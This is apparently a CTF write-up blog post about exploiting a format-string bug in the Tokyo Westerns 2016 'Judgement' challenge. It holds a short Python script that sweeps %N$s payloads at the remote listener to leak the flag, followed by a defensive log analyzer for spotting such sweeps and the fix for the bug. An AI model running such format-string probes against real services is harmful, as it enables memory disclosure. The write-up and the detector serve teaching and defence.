Kebechet!


a collection of stuff, thangs.....

Fuzzing simple listeners

Posted: 2016-09-05 17:26:16 (ohai)
Tokyo Westerns 2016 was this past weekend, and one of the challenges (Judgement) had you connect to a remote listener and send it something. It was vulnerable to a format string bug, so we could leak the stack. Printing the stack:
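#!/usr/bin/env python3

import socket

# Ask for stack argument i as a string (%<i>$s), one new connection per attempt
for i in range(50):
  csock = socket.socket()
  csock.connect(('pwn1.chal.ctf.westerns.tokyo', 31729))
  csock.send(("%" + str(i) + "$s" + "\n").encode())
  x = csock.recv(1024).decode(errors="replace")
  csock.close()
  # Stop as soon as the leaked string contains the flag prefix
  if 'TWCTF' in x:
    print(x)
    break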
After a bit, we are rewarded with:
Input flag >> TWCTF{R3:l1f3_1n_4_pwn_w0rld_fr0m_z3r0}
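
Seen from the listener's side, a sweep like the one above stands out: one source, many short connections, each carrying a positional `%N$s` with a different N. The following is an added example, not part of the original post or the challenge; the log format, the `analyze`/`find_specs` names and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# One printf conversion spec, or a literal "%%" (consumed so "%%d" is not flagged).
# The space flag is left out on purpose so text like "100% sure" does not match.
FMT_SPEC = re.compile(
    r"%(?:%|(?:(?P<pos>\d+)\$)?[-+#0]*\d*(?:\.\d+)?"
    r"(?:hh|h|ll|l|j|z|t|L)?(?P<conv>[diouxXeEfgGaAcspn]))"
)
# Assumed log format: "<timestamp> <source ip> input=<quoted payload>"
LOG_LINE = re.compile(r'^(?P<ts>\S+) (?P<src>\S+) input="(?P<payload>.*)"$')

def find_specs(payload):
    """Return (positional index or None, conversion char) for each spec."""
    return [
        (int(m["pos"]) if m["pos"] else None, m["conv"])
        for m in FMT_SPEC.finditer(payload)
        if m["conv"]  # skip literal "%%"
    ]

def analyze(lines, sweep_threshold=5):
    """Group format-string probes by source and flag positional sweeps."""
    seen = defaultdict(lambda: {"probes": 0, "positions": set(), "writes": 0})
    for line in lines:
        m = LOG_LINE.match(line)
        specs = find_specs(m["payload"]) if m else []
        if not specs:
            continue
        entry = seen[m["src"]]
        entry["probes"] += 1
        entry["positions"].update(p for p, _ in specs if p is not None)
        entry["writes"] += sum(1 for _, c in specs if c == "n")  # %n writes memory
    return {
        src: {**e, "positions": sorted(e["positions"]),
              "sweep": len(e["positions"]) >= sweep_threshold}
        for src, e in seen.items()
    }

# Constructed sample: one client sweeping %0$s..%7$s, one benign client.
SAMPLE = [f'2016-09-03T10:00:{i:02d}Z 203.0.113.7 input="%{i}$s"' for i in range(8)]
SAMPLE += [
    '2016-09-03T10:01:00Z 198.51.100.4 input="hello"',
    '2016-09-03T10:01:05Z 198.51.100.4 input="100%% sure"',
]

if __name__ == "__main__":
    for src, report in analyze(SAMPLE).items():
        print(src, report)
```

Detection only tells you it happened; the fix on the service side is to never pass client input as the format argument (`printf("%s", buf)` rather than `printf(buf)`).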

Post Tagged with:
CTF, Python, Sockets

